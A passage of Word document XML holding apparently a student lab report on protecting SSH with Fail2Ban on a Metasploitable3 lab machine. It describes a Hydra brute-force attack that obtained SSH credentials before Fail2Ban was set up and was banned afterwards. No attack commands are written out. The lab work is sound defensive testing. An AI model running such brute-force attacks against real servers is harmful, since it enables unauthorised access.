        </w:rPr>
        <w:t xml:space="preserve"> apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45517ABA" w14:textId="54C2DA6E" w:rsidR="005D6CB0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D6CB0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install fail2ban -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B6979E" w14:textId="77777777" w:rsidR="005D6CB0" w:rsidRDefault="005D6CB0" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D58F59" w14:textId="0B192CD9" w:rsidR="005D6CB0" w:rsidRDefault="00125E24" w:rsidP="005D6CB0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">custom configuration file for Fail2Ban to protect the SSH service. The configuration limits the number of failed </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> attempts to 3 and bans the attacker’s IP for 1 hour (3600 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0C6C6" w14:textId="25F5A13E" w:rsidR="00125E24" w:rsidRDefault="00125E24" w:rsidP="00125E24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B3792D3" wp14:editId="7410EA6A">
            <wp:extent cx="5943600" cy="1835150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9968401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0162" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1835150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DD8E5" w14:textId="77777777" w:rsidR="00125E24" w:rsidRPr="005D6CB0" w:rsidRDefault="00125E24" w:rsidP="00125E24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7585C5E7" w14:textId="08F1D14E" w:rsidR="00125E24" w:rsidRDefault="00125E24" w:rsidP="00125E24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>After configuring Fail2Ban, we restarted the service to apply the new SSH protection rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEA43D4" w14:textId="6A3D67B2" w:rsidR="00125E24" w:rsidRDefault="00125E24" w:rsidP="00125E24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00125E24">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50BFF972" wp14:editId="63B56367">
            <wp:extent cx="5943600" cy="390525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19410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0663" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="390525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522B047" w14:textId="77777777" w:rsidR="00125E24" w:rsidRDefault="00125E24" w:rsidP="00125E24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4750B7" w14:textId="01266E89" w:rsidR="00A22DFB" w:rsidRPr="00AB497B" w:rsidRDefault="00766CB5" w:rsidP="00AB497B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing the Defense (Brute-force Attack Attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDE96F3" w14:textId="60E8CDBF" w:rsidR="001535A1" w:rsidRDefault="00766CB5" w:rsidP="001535A1">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">-   </w:t>
      </w:r>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Attack Attempt</w:t>
      </w:r>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The goal was to verify if the defensive configuration using </w:t>
      </w:r>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fail2Ban</w:t>
      </w:r>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> would block the attack after multiple failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F461E" w14:textId="4D00D10D" w:rsidR="00766CB5" w:rsidRDefault="00766CB5" w:rsidP="00766CB5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A22DFB" w:rsidRPr="00A22DFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3360B5D1" wp14:editId="6A77F072">
            <wp:extent cx="3057754" cy="1866341"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="7783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964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3064374" cy="1870382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39681EB1" w14:textId="77777777" w:rsidR="00766CB5" w:rsidRDefault="00766CB5" w:rsidP="00766CB5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AC49F38" w14:textId="0E98C020" w:rsidR="00766CB5" w:rsidRDefault="00766CB5" w:rsidP="00766CB5">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">2-   </w:t>
      </w:r>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Detection and Blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F38F14" w14:textId="19D002E4" w:rsidR="00766CB5" w:rsidRDefault="00766CB5" w:rsidP="00A22DFB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766CB5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>On the victim machine (Metasploitable3), we checked the Fail2Ban status to verify if the attacker's IP address was detected and banned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E6C95A" w14:textId="5C0BAE68" w:rsidR="00766CB5" w:rsidRDefault="00A22DFB" w:rsidP="00A22DFB">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="757294CA" wp14:editId="06548796">
            <wp:extent cx="4794171" cy="1550823"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="1748730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0091" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4816543" cy="1558060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9411DD" w14:textId="77777777" w:rsidR="00AB497B" w:rsidRPr="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E0AFA" w14:textId="77777777" w:rsidR="00AB497B" w:rsidRPr="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The attacker's IP address 192.168.8.153 appeared in the banned IP list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3777DB6F" w14:textId="77777777" w:rsidR="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>SSH brute-force attempts from the attacker machine were successfully blocked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EAE908" w14:textId="3EDFBB18" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4AA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2819513A" wp14:editId="4C0FF0F4">
            <wp:extent cx="4184294" cy="2500295"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="206730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1450" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4202112" cy="2510942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C88491E" w14:textId="2A1D7014" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4AA4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F4AA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Before-and-After</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F4AA4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Demonstrat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4CC771" w14:textId="01E0479F" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4A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F4AA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Before implementing Fail2Ban, the SSH service was vulnerable.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F4AA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>The attacker was able to successfully perform a brute-force attack using Hydra and obtained valid SSH credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04640D53" w14:textId="77777777" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4AA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6EFC3A4" w14:textId="7341851E" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4A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B263C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="339CD439" wp14:editId="22866028">
            <wp:extent cx="5480050" cy="1214755"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="73317464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656" name="Picture 2"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1214755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A31AB0B" w14:textId="77777777" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4AA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6C0042C" w14:textId="0D5FCEC5" w:rsidR="007F4AA4" w:rsidRPr="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="007F4A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F4AA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>After applying the Fail2Ban configuration, the attacker was unable to continue the brute-force attack.</w:t>
      </w:r>
      <w:r w:rsidRPr="007F4AA4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>Hydra failed to complete the attack and reported multiple connection errors, indicating that the attacker's IP address was successfully banned by Fail2Ban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB86D3E" w14:textId="6143EC58" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DFB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05CEC4EA" wp14:editId="6864E96C">
            <wp:extent cx="3057754" cy="1866341"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="9997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964" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3064374" cy="1870382"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C381E83" w14:textId="77777777" w:rsidR="007F4AA4" w:rsidRDefault="007F4AA4" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496081F9" w14:textId="7369D9B0" w:rsidR="00AB497B" w:rsidRPr="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166716F5" w14:textId="77777777" w:rsidR="00AB497B" w:rsidRPr="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>In this phase, we successfully implemented a defensive strategy to protect the SSH service on the victim machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>We installed and configured Fail2Ban to monitor authentication logs and block any IP address after three failed login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE88541" w14:textId="77777777" w:rsidR="00AB497B" w:rsidRPr="00AB497B" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The defense was tested by re-running a brute-force SSH attack from the attacker machine using Hydra.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:br/>
        <w:t>Fail2Ban detected the repeated failures and automatically banned the attacker’s IP address, effectively stopping further intrusion attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD86B0" w14:textId="3A6B3897" w:rsidR="00AB497B" w:rsidRPr="00766CB5" w:rsidRDefault="00AB497B" w:rsidP="00AB497B">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB497B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This demonstrates the effectiveness of Fail2Ban in mitigating brute-force attacks and improving the overall security of the system.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AB497B" w:rsidRPr="00766CB5" w:rsidSect="007717C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0B58"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F24613B8"/>
    <w:lvl w:ilvl="0" w:tplc="57442A9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285F92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="43C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652585">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1056392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3F"/>
    <w:rsid w:val="00015BD9"/>
    <w:rsid w:val="00125E24"/>
    <w:rsid w:val="001535A1"/>
    <w:rsid w:val="00223651"/>
    <w:rsid w:val="003633AF"/>
    <w:rsid w:val="003A3C2C"/>
    <w:rsid w:val="00436D8D"/>
    <w:rsid w:val="004D7769"/>
    <w:rsid w:val="00590D22"/>
    <w:rsid w:val="005D6CB0"/>
